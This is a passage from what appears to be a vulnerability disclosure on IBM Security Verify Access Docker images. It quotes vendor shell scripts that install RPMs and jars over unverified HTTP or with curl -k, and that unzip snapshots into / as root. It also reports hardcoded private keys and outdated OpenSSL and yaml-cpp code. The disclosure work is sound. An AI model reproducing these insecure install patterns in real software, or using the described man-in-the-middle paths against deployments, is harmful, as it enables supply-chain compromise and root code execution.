[code:shell] 47 # 48 # Install OpenLDAP. This is no longer provided by CentOS. 49 # 50 51 sofl_repo_file="/etc/yum.repos.d/sofl.repo" 52 53 curl https://repo.symas.com/configs/SOFL/rhel8/sofl.repo \ 54 -o $sofl_repo_file [/code]

It was confirmed that this configuration appears in the verify-access-runtime instance in the live system:

[isam@verify-access-runtime /]$ cat /etc/yum.repos.d/sofl.repo 
[sofl]
name=Symas OpenLDAP for Linux RPM repository
baseurl=https://repo.symas.com/repo/rpm/SOFL/rhel8
gpgkey=https://repo.symas.com/repo/gpg/RPM-GPG-KEY-symas-com-signing-key
gpgcheck=1
enabled=1
[isam@verify-access-runtime /]$

When reading the /usr/sbin/install_system.sh script, this repository is used to install an additional package, without checking the signature:

[code:shell] 58 # 59 # We want to manually install the openldap server RPM as microdnf pulls 60 # in a whole heap of dependencies which we don't require. 61 # 62 63 baseurl=grep baseurl $sofl_repo_file | cut -f 2 -d '='/x86_64 64 version=rpm -q --qf "%{VERSION}-%{RELEASE}" symas-openldap 65 rpmfile=/tmp/openldap.rpm 66 67 curl $baseurl/symas-openldap-servers-$version.x86_64.rpm -o $rpmfile 68 69 rpm -i --nodeps $rpmfile 70 71 rm -f $rpmfile [/code]

There is a potential supply-chain attack and this dependency is not documented.

Details - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime

It was observed that the Docker image verify-access-runtime uses a highly insecure /usr/sbin/install_system.sh script.

With the 2 previous vulnerabilities already explained in Additional repository configuration (potential supply-chain attack) and Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh), this version adds 2 new vulnerabilities:

- Installation of 3 packages downloaded over HTTP without checking the signature (lines 82, 84 and 90); and
- Replacement of /usr/share/java/postgresql-jdbc/postgresql.jar using a postgresql.jar file directly retrieved over HTTP (line 99) and with -k (aka --insecure).

Content of /usr/sbin/install_system.sh:

[code:shell] 73 # 74 # For the postgresql packages we need to download and install manually so 75 # that we don't also pull in all of the unnecessary dependencies. 76 # 77 78 centos_base=http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/ 79 80 rpms=/tmp/rpms.txt 81 82 curl http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/ -o $rpms 83 84 for pkg in postgresql-12 postgresql-server-12 postgresql-jdbc-42; do 85 rpm_file=grep $pkg $rpms | tail -n 1 | \ 86 sed 's|.*href="||g' | cut -f 1 -d '"' 87 88 echo "Installing: $rpm_file" 89 90 rpm -i --nodeps $centos_base/$rpm_file 91 done 92 93 rm -f $rpms 94 95 # 96 # Need a more current jar then what is part of the postges-jdbc rpm 97 # 98 postgres_jar=locate_file postgresql-.*.jar 99 curl -kv ${WEBSERVER}/$postgres_jar -o /usr/share/java/postgresql-jdbc/postgresql.jar [/code]

An attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious rpm or a malicious .jar file and take control over the entire platform.

Note that IBM does not consider this vulnerability since the script is supposed to be executed in a secure network.

Details - Remote Code Execution due to insecure reload script in verify-access-runtime

It was observed that the Docker image verify-access-runtime uses a highly insecure reload script.

An attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform.

This script is defined at the end of the /usr/sbin/install_system.sh script:

Content of /usr/sbin/install_system.sh in verify-access-runtime:

[code:shell] 239 # 240 # Ensure that the reload script is executable. 241 # 242 243 mv /sbin/reload.sh /sbin/runtime_reload 244 245 chmod 755 /sbin/runtime_reload [/code]

Analysis of /sbin/runtime_reload:

The function download_from_cfgsvc() is insecure as the curl command uses the -k option (as known as --insecure) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the -k option.

We can also see that Postgres does not have passwords in line 144, already found in Lack of authentication in Postgres inside verify-access-runtime.

[code:shell] 67 ############################################################################# 68 # Attempt to download the snapshot from the configuration service. 69 70 download_from_cfgsvc() 71 { 72 # No need to download the snapshot if the configuration service has not 73 # been defined. 74 if [ -z "$CONFIG_SERVICE_URL" ] ; then 75 return 76 fi 77 78 if [ $1 -eq 1 ] ; then 79 Echo 960 80 fi 81 82 curl -k -s --fail -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \ 83 "$CONFIG_SERVICE_URL/snapshots/basename $snapshot?type=File" \ 84 -o $snapshot 85 86 if [ $? -ne 0 ] ; then 87 if [ $1 -eq 1 ] ; then 88 Echo 961 89 fi 90 91 rm -f $snapshot 92 else 93 Echo 962 94 fi 95 } [...] 97 ############################################################################# 98 # Main line. 99 100 # 101 # Download the snapshot file. 102 # 103 104 download_from_cfgsvc 1 [...] 127 # 128 # Update the configuration database. 129 # 130 131 Echo 997 132 133 db_root=/var/postgresql/config 134 db_snapshot=$db_root/snapshot.sql 135 db_port=5432 136 db_name=config 137 db_user=www-data 138 139 if [ ! -f $db_snapshot ] ; then 140 Echo 975 141 exit 1 142 fi 143 144 psql -U $db_user -d $db_name -p $db_port -f $db_snapshot -q -b -w

[/code]

Details - Remote Code Execution due to insecure reload script in verify-access-wrp

It was observed that the Docker image verify-access-wrp uses a highly insecure reload script.

An attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. He can also overwrite any file present in the verify-access-wrp docker instance (getting a Remote Code Execution).

This script is defined at the end of the /usr/sbin/install_system.sh script:

Content of /usr/sbin/install_system.sh in verify-access-wrp:

[code:shell] 210 # 211 # Ensure that the restart script is executable. 212 # 213 214 mv /sbin/restart.sh /sbin/wrprestart 215 216 chmod 755 /sbin/wrprestart [/code]

Analysis of /sbin/wrprestart:

The openldap.zip file found in the malicious snapshot file will then be decrypted using a previously found hardcoded key and extracted into the / directory (line 154 and 156) and openldap will be restarted with the new configuration file, allowing an attacker to get a Remote Code Execution by specifying a malicious slapd.conf file (stored inside openldap.zip, in etc/openldap/slapd.conf).

Since the extraction of openldap.zip takes place in /, it is also possible to overwrite any file as root (and get Remote Code Execution, e.g. by replacing a program).

[code:shell] 85 ############################################################################# 86 # Attempt to download the snapshot from the configuration service. 87 88 download_from_cfgsvc() 89 { 90 # No need to download the snapshot if the configuration service has not 91 # been defined. 92 if [ -z "$CONFIG_SERVICE_URL" ] ; then 93 return 94 fi 95 96 if [ $1 -eq 1 ] ; then 97 Echo 960 98 fi 99 100 curl -k -s --fail -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \ 101 "$CONFIG_SERVICE_URL/snapshots/basename $snapshot?type=File" \ 102 -o $snapshot 103 104 if [ $? -ne 0 ] ; then
105 if [ $1 -eq 1 ] ; then
106 Echo 961
107 fi 108 109 rm -f $snapshot 110 else 111 Echo 962 112 fi 113 } [...] 137 ############################################################################# 138 # Process the OpenLDAP configuration and then restart the OpenLDAP server. 139 140 restart_openldap_server() 141 { 142 # Check to see whether the embedded LDAP server has been enabled or 143 # not. 144 ldap_conf="/var/PolicyDirector/etc/ldap.conf" 145 ldap_host=$pdconf -f $ldap_conf getentry ldap host 146 147 if [ "$ldap_host" != "127.0.0.1" ] ; then 148 return 149 fi 150 151 Echo 964 152 153 # Decrypt and extract the LDAP configuration. 154 isva_decrypt $snapshot_tmp_dir/openldap.zip 155 156 unzip -q -o $snapshot_tmp_dir/openldap.zip -d / 157 158 # Change the LDAP port from 389 to 6389 (389 is a privileged port). 159 $pdconf -f $ldap_conf setentry ldap port 6389 160 161 # Stop the LDAP server. 162 busybox killall -SIGHUP slapd 163 164 while $(busybox killall -0 slapd 2>/dev/null); do 165 sleep 1 166 done 167 168 # Start the LDAP server. 169 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0 170 } [...] 260 ############################################################################# 261 # Main line. 262 263 # 264 # Attempt to download the configuration data from the configuration service. 265 # 266 267 # 268 # Wait for the snapshot file. 269 # 270 271 download_from_cfgsvc 1 [...] 305 # 306 # Restart the OpenLDAP server. 307 # 308 309 restart_openldap_server [/code]

Details - Hardcoded private key for IBM ISS (ibmcom/verify-access)

It was observed that the ibmcom/verify-access Docker image contains a hardcoded private key used by the license client iss-lum:

kali-docker# pwd 
/home/user/ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/lum

kali-docker# ls -al 
total 492 
drwxr-xr-x  2 root root   4096 Jun  8 01:43 . 
drwxr-xr-x 25 root root   4096 Jun  8 04:09 .. 
-rwxr-xr-x  1 root root   1296 Oct 20  2016 externalTrustSettings.xml
-rwxr-xr-x  1 root root 445080 Oct 20  2016 iss-external.kdb
-rwxr-xr-x  1 root root    129 Oct 20  2016 iss-external.sth
-rwxr-xr-x  1 root root    100 Oct 20  2016 iss-lum.conf
-rwxr-xr-x  1 root root   3649 Oct 20  2016 isslum-usLocalSettings.xml
-rwxr-xr-x  1 root root    725 Oct 20  2016 lum_triggers.conf
-rwxr-xr-x  1 root root   1858 Oct 20  2016 private.pem
-rwxr-xr-x  1 root root    451 Oct 20  2016 public.pem
-rwxr-xr-x  1 root root   3926 Oct 20  2016 .udrc
-rwxr-xr-x  1 root root    806 Oct 20  2016 update-settings.conf
-rwxr-xr-x  1 root root   7352 Oct 20  2016 update-status.xsd
-rwxr-xr-x  1 root root    561 Jun  8 01:32 UpdateTypeNames.config
-rwxr-xr-x  1 root root      0 Dec 31  1969 .wh..wh..opq

kali-docker# sha256sum private.pem public.pem
e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d  private.pem
3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20  public.pem

When analyzing the podman instance verify-access, we can confirm the key has not been updated:

[isam@verify-access lum]$ sha256sum private.pem  public.pem
e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d  private.pem
3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20  public.pem
[isam@verify-access lum]$

The private key appears to be used by several programs:

- /opt/dca/bin/dcatool
- /usr/bin/isslum-modstatus
- /usr/sbin/iss-lum
- /usr/sbin/mesa_config
- /usr/sbin/mesa_eventsd
- /usr/sbin/isslum-installer

The license client is using outdated codes and may contain vulnerabilities.

The keys are hardcoded and have not been updated for 6 years, which brings a question how the license client is being maintained.

Details - dcatool using an outdated OpenSSL library (ibmcom/verify-access)

It was observed that the dcatool program located in /opt/dca/bin is linked with an outdated OpenSSL library located in the non-standard directory /opt/dca/lib:

From a live system:

[isam@verify-access bin]$ pwd /opt/dca/bin [isam@verify-access bin]$ ls -la total 580 drwxr-xr-x 2 root root 4096 Jun 8 13:43 . drwxr-xr-x 4 root root 4096 Jun 8 13:43 .. -rwxr-xr-x 1 root root 373208 Jun 8 13:31 dcatool -rwxr-xr-x 1 root root 207872 Jun 8 13:31 dcaupdate [isam@verify-access bin]$ ldd dcatool | grep ssl libssl.so.10 => /opt/dca/lib/libssl.so.10 (0x00007fafcfb1e000) libssl.so.1.1 => /lib64/libssl.so.1.1 (0x00007fafcda45000) [isam@verify-access bin]$ ldd dcaupdate | grep ssl libssl.so.10 => /opt/dca/lib/libssl.so.10 (0x00007fe04980d000) libssl.so.1.1 => /lib64/libssl.so.1.1 (0x00007fe047734000)

Analysis of the library:

[isam@verify-access lib]$ pwd
/opt/dca/lib
[isam@verify-access lib]$ ls -la
total 4156
drwxr-xr-x 2 root root    4096 Jun  8 13:43 . 
drwxr-xr-x 4 root root    4096 Jun  8 13:43 .. 
-rwxr-xr-x 1 root root 1252080 Jun  8 13:31 libboost_regex.so.1.53.0
-rwxr-xr-x 1 root root 2521496 Jun  8 13:31 libcrypto.so.10
lrwxrwxrwx 1 root root      24 Jun  8 13:43 libicudata.so.54 -> /usr/lib64/libicudata.so
lrwxrwxrwx 1 root root      24 Jun  8 13:43 libicui18n.so.54 -> /usr/lib64/libicui18n.so
lrwxrwxrwx 1 root root      22 Jun  8 13:43 libicuuc.so.54 -> /usr/lib64/libicuuc.so
-rwxr-xr-x 1 root root  470328 Jun  8 13:31 libssl.so.10
[isam@verify-access lib]$ sha256sum *so*
a4b9594f78c0e5cfa14c171e07ae439dccd0ef990db8c4b155c68fde43a8d9a9  libboost_regex.so.1.53.0
8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c  libcrypto.so.10
07796e84fc3618a64259cfff7a896e57fc90f6b270d690d953f4792c2b7e21ac  libicudata.so.54
49e6f6b12d118118c7d17cec26f80c81b39c89ea01a30eaf26abb07859d909fe  libicui18n.so.54
1504c73f432bc24414c0ca69d29bdb04c04ba2269b752c320306cb25aadd5972  libicuuc.so.54
523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0  libssl.so.10
[isam@verify-access lib]$

We can retrieve these 2 libraries inside the ibmcom/verify-access image and identify the version of OpenSSL:

kali-docker# sha256sum **/libssl.so.10                                                                                                
523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0  698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10
kali-docker# sha256sum **/libcrypto.so.10                                                                                             
8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c  698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10

kali-docker# kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10|grep -i openssl
[...][
OpenSSL 1.0.2k-fips  26 Jan 2017
[...]
kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10|grep -i openssl
OpenSSL 1.0.2k-fips  26 Jan 2017
[...]

The libraries located in /opt/dca/lib are completely outdated and are vulnerable to known CVEs.

These libraries are likely used by IBM-specific programs.

The Docker images contain known vulnerabilities.

Details - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys

It was observed that the /usr/sbin/iss-lum program from the verify-access Docker image contains outdated OpenSSL code (from the library 0.9.7) from 2007. The iss-lum program is the license client that will connect to external servers.

This program runs inside the instance:

[isam@verify-access /]$ ps -auxw
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
isam           1  0.0  0.0  12060   132 ?        Ss   Oct04   0:00 /bin/sh /sbin/bootstrap.sh
isam         313  0.0  0.0  24532    68 ?        Ss   Oct04   0:00 /usr/sbin/mesa_crashd
isam         315  0.1  0.0  24532  1032 ?        S    Oct04   1:57 /usr/sbin/mesa_crashd
isam         319  0.0  0.0  69160   144 ?        Ss   Oct04   0:00 /usr/sbin/mesa_syslogd
isam         321  0.0  0.0  69224  1280 ?        S    Oct04   0:00 /usr/sbin/mesa_syslogd
isam         400  0.0  0.0 102760   200 ?        Ss   Oct04   0:00 /usr/sbin/mesa_eventsd -m 1000
isam         401  0.0  0.0 710856   316 ?        Sl   Oct04   0:00 /usr/sbin/mesa_eventsd -m 1000
pgresql      435  0.0  0.0 188380  7016 ?        Ss   Oct04   0:02 /usr/bin/postgres -D /var/postgresql/config/data
pgresql      436  0.0  0.0 138892   184 ?        Ss   Oct04   0:00 postgres: logger   
pgresql      447  0.0  0.0 188380  1600 ?        Ss   Oct04   0:00 postgres: checkpointer   
pgresql      448  0.0  0.0 188516  1288 ?        Ss   Oct04   0:01 postgres: background writer   
pgresql      449  0.0  0.0 188380  1468 ?        Ss   Oct04   0:01 postgres: walwriter   
pgresql      450  0.0  0.0 189112  1864 ?        Ss   Oct04   0:01 postgres: autovacuum launcher   
pgresql      451  0.0  0.0 139024   588 ?        Ss   Oct04   0:05 postgres: stats collector   
pgresql      452  0.0  0.0 188916  1016 ?        Ss   Oct04   0:00 postgres: logical replication launcher   
www-data     548  0.4  4.8 4920352 387128 ?      SLl  Oct04   7:53 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/default/java.security -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/lmi -Xbootclasspath/a:/opt/pdjrte/java/export/rgy/com.tivoli.pd.rgy.jar:/opt/ibm/wlp/usr/servers/runtime/lib/global/xercesImpl.jar -Dorg.osgi.framework.system.packages.extra=com.tivoli.pd.rgy,com.tivoli.pd.rgy.authz,com.tivoli.pd.rgy.exception,com.tivoli.pd.rgy.ldap,com.tivoli.pd.rgy.nls,com.tivoli.pd.rgy.util,com.ibm.misc,com.ibm.net.ssl.www2.protocol.https,com.sun.jndi.ldap,org.apache.xml.serialize -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 --add-exports java.base/sun.security.action=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.ldap=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.url.ldap=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util.concurrent=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.naming/javax.naming.spi=ALL-UNNAMED --add-opens jdk.naming.rmi/com.sun.jndi.url.rmi=ALL-UNNAMED --add-opens java.naming/javax.naming=ALL-UNNAMED --add-opens java.rmi/java.rmi=ALL-UNNAMED --add-opens java.sql/java.sql=ALL-UNNAMED --add-opens java.management/javax.management=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.desktop/java.awt.image=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED -jar /opt/IBM/wlp/bin/tools/ws-server.jar default --clean
isam         748  0.0  0.0 270992     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap
ldap         753  0.0  4.3 1314228 346548 ?      Sl   Oct04   0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap
isam         757  0.0  0.0 271124     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground
ivmgr        762  0.0  0.1 1070184 10860 ?       Sl   Oct04   0:01 /opt/PolicyDirector/bin/pdmgrd -foreground
isam         805  0.0  0.0  71488   316 ?        Ss   Oct04   0:00 /usr/sbin/iss-lum
isam         806  0.0  0.0 343920  5264 ?        Sl   Oct04   0:00 /usr/sbin/iss-lum
root         811  0.0  0.0  41984  2416 ?        Ss   Oct04   0:00 /usr/sbin/crond
isam         834  0.0  0.0 128400  2076 ?        Ssl  Oct04   0:00 /usr/sbin/rsyslogd
root         859  0.0  0.0 174348    96 ?        Ss   Oct04   0:00 /usr/sbin/wga_servertaskd
ivmgr        861  0.0  0.0 276544    84 ?        Sl   Oct04   0:00 /usr/sbin/wga_servertaskd
isam         870  0.0  0.0 273920     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground
isam         877  2.1  0.2 563872 18472 ?        Sl   Oct04  38:43 wga_notifications -foreground
isam         889  0.0  0.0  12060    80 ?        S    Oct04   0:00 /bin/sh /sbin/bootstrap.sh
isam         892  0.0  0.0  23068    24 ?        S    Oct04   0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log
isam      217541  4.0  0.0  19248  3836 pts/0    Ss   21:37   0:00 bash
isam      217564  0.0  0.0  54808  4080 pts/0    R+   21:37   0:00 ps -auxww
[isam@verify-access /]$

This program appears to establish connections to remote servers to check the license.

The OpenSSL library embedded inside the program is completely outdated (0.9.7j - Feb 2007):

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Furthermore, this program includes several hardcoded keys to decrypt the private key in /etc/lum/private.pem. In the function ctor_009:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Some decryption keys have been identified within the binaries used to check the license:

Function sub_4806C0:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Function ctor_009:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The Docker images contain known vulnerabilities.

Details - Outdated "IBM Crypto for C" library

It was observed that the IBM Crypto for C library is installed inside all the Docker images in the directory /usr/local/ibm/gsk8_64:

For example, from the Docker image verify-access-wrp:

kali-docker# cd ./_verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a 
kali-docker# find usr/local/ibm       
usr/local/ibm
usr/local/ibm/gsk8_64
usr/local/ibm/gsk8_64/lib64
usr/local/ibm/gsk8_64/lib64/libgsk8cms_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8kicc_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8p11_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8ssl_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8drld_64.so
usr/local/ibm/gsk8_64/lib64/C
usr/local/ibm/gsk8_64/lib64/C/icc
usr/local/ibm/gsk8_64/lib64/C/icc/icclib
usr/local/ibm/gsk8_64/lib64/C/icc/icclib/libicclib084.so
usr/local/ibm/gsk8_64/lib64/C/icc/icclib/ICCSIG.txt
usr/local/ibm/gsk8_64/lib64/libgsk8ldap_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8iccs_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8valn_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8acmeidup_64.so
usr/local/ibm/gsk8_64/lib64/N
usr/local/ibm/gsk8_64/lib64/N/icc
usr/local/ibm/gsk8_64/lib64/N/icc/icclib
usr/local/ibm/gsk8_64/lib64/N/icc/icclib/libicclib085.so
usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt
usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt
usr/local/ibm/gsk8_64/lib64/libgsk8dbfl_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8km2_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8km_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8sys_64.so
usr/local/ibm/gsk8_64/docs
usr/local/ibm/gsk8_64/copyright
usr/local/ibm/gsk8_64/inc
usr/local/ibm/gsk8_64/bin
usr/local/ibm/gsk8_64/bin/gsk8capicmd_64
usr/local/ibm/gsk8_64/bin/gsk8ver_64
usr/local/ibm/.wh..wh..opq
kali-docker#

This library is based on the opensource libraries zlib and OpenSSL. It was built in October 2020, as shown below:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Furthermore, the copyrights from the /usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt file indicate:

- (C) 1995-2004 Jean-loup Gailly and Mark Adler - for zlib

The /usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt file confirms the libraries were generated 2 years ago:

#
# IBM Crypto for C. 
# ICC Version 8.7.37.0
#
# Note the signed library contains a copy of cryptographic code from OpenSSL (www.openssl.org),
# zlib (www.zlib.org)
# and IBM code (www.ibm.com)
#
# Platform AMD64_LINUX
#
# Generated Tue Oct 13 12:09:08 2020
#
# File name=libicclib085.so
# File Hash (SHA256)=bbbb89eae43b11aba9a132a53207ca532236cd064b6aa0b84ea878a0b9bf8b4f
#
FILE=906082662e6b3a50fc01a95f2d1bb29d3a54349ad76da59fc8555fadadae4e5305463810ece2064174129a95e89352a02d8c72c7397de2d01b38220c3222796992785b8d99401a65b0894778a2b05760ae1a6919a97e259d270ff5e6996a14fc29e48a848c59e14f2aa758e8e26355faeff60eca0562ad643a86b8fdaa6afd10190190d411a584679ff1ee93caf5039ef070d411040fc828e4b8f79b8bb67d3ec1708c8274c0c9f6899399492fa52c73574065f2684dcc336c41eee2b808b42b0a01578b32fae245b761580240e3b53359767634ba76018f46a8d732c21ec24bf1a979aa11af20b646f166d5658efabcebdf6283fbdc793d82636e89bf2ac4ad
#
SELF=10fefb48a0666936f23aceae7805a7dcefb06a9a2282fea0693610a98ccf12cab8bfef973cda13450afde785960eccb2637adaf15f5e795cdb21f667704ba30ebf6a6a077f29a3574d0792ef633172d324a5b26adc257d3380ffd1cf7698bc560fb52d5c083ffa85fe623e059f7c8d67a8043ca75d8808c082de29bb8e1c46a01421039e557699cf7747c07a22a0e1612b0e4de8836833bebc888269dc46adf0ed5ba0107da2e683554433ed29ab840d16af34581682e35a30d11ff10fbd8ba0cc7ae6a62b75c3ba4758863e5a5a4cf00371040358a732a56ecf7dd04523c85544755c6f0f42447f383ec22e0ee4d79bb3c6e6defc4319f555afaaa1cfc8642f
#
#Do not edit before this line
#
# Global Settings
ICC_ALLOW_2KEY3DES=1

The OpenSSL code and the zlib code are at least 2 year old and vulnerable to CVEs.

The Docker images contain known vulnerabilities.

Details - Webseald using outdated code with remotely exploitable vulnerabilities

It was observed that the webseald program borrows codes provided by open-source libraries containing outdated and vulnerable code. This program can be found inside these 2 images:

- verify-access
- verify-access-wrp

Webseald is reachable over the network.

Libraries used by webseald:

kali-docker# ldd ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/opt/pdweb/bin/webseald
        linux-vdso.so.1 (0x00007fffe59f3000)
        libwsdaemon.so => not found
        libamwoauth.so => not found
        libamweb.so => not found
        libamwebrte.so => not found
        libpdsvcutl.so => not found
        libtivsec_msg.so => not found
        libpdz.so => not found
        libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f61885e8000)
        libtivsec_xslt4c.so.112 => not found
        libtivsec_xml4c.so => not found
        libtivsec_yamlcpp.so => not found
        libam_gssapi_krb5.so => not found
        libmodsecurity.so.3 => not found
        libamwredismgr.so => not found
        libhiredis.so.0.15 => not found
        libhiredis_ssl.so.0.15 => not found
        libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f61885df000)
        libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f6188200000)
        libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6188504000)
        libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f61884e4000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6187e00000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f6188604000)

The IBM-specific libraries (.so) have been analyzed only in surface to detect low-hanging fruits, and several vulnerabilities were found, including some pre-auth vulnerabilities.

Webseal is directly reachable from the network but uses the outdated and vulnerable code.

The quality of the code is extremely inequal between the libraries - some code is very well implemented (with secure calls to -cpy functions) and some code is vulnerable (with insecure calls to -cpy functions). These libraries contain some legacy codes that are not up to date with the current security standards.

Due to the lack of time, only a superficial analysis was done - an attacker with time will likely find 0-day vulnerabilities in these libraries.

Libmodsecurity.so - 1 non-assigned CVE vulnerability

The /opt/pdweb/lib/libmodsecurity.so.3 library (b939c5db3ca94073188ea6eb360049f58f9e9d2a9c7d72bc052d9ee47cc5eccc) contains a vulnerable libinjection library. The version used is 3.9.2:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

This version (3.9.2) is known to have several vulnerabilities. For example, a pre-authentication DoS (https://github.com/SpiderLabs/ModSecurity/issues/1412) from 2017 (no CVE).

This version is confirmed to be vulnerable: https://github.com/client9/libinjection/issues/124.

libtivsec_yamlcpp.so - 4 CVEs

This IBM library is entirely based on yaml-cpp. Yaml-cpp is available at https://github.com/jbeder/yaml-cpp.

Several vulnerabilities have been patched in 2020 (CVE-2017-5950, CVE-2018-20573, CVE-2018-20574 and CVE-2019-6285) in the yaml-cpp library.

This IBM-specific library is located at /usr/lib64/libtivsec_yamlcpp.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so (cf1b80c501a2f42948322567477c2956155e244d645e3962985569c4496ffad90).

When doing reverse engineering on this file, it appears no security patches have been imported from the official yaml-cpp repository.

We can identify several methods from the yaml-cpp library. For example, the method SingleDocParser::HandleFlowMap() found in /usr/lib64/libtivsec_yamlcpp.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

When analyzing the security patches available at https://github.com/jbeder/yaml-cpp/pull/807 and https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b, there is no reference in the compiled code regarding a DeepRecursion class or any method implemented in the security patches. This DeepRecursion class is included in the now-patched versions.

The IBM-specific library is using an outdated and vulnerable version of yaml-cpp, without security patches, e.g. 4 CVEs patched in yaml-cpp - https://github.com/jbeder/yaml-cpp/pull/807.

Analysis of the security patches implementing new classes:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

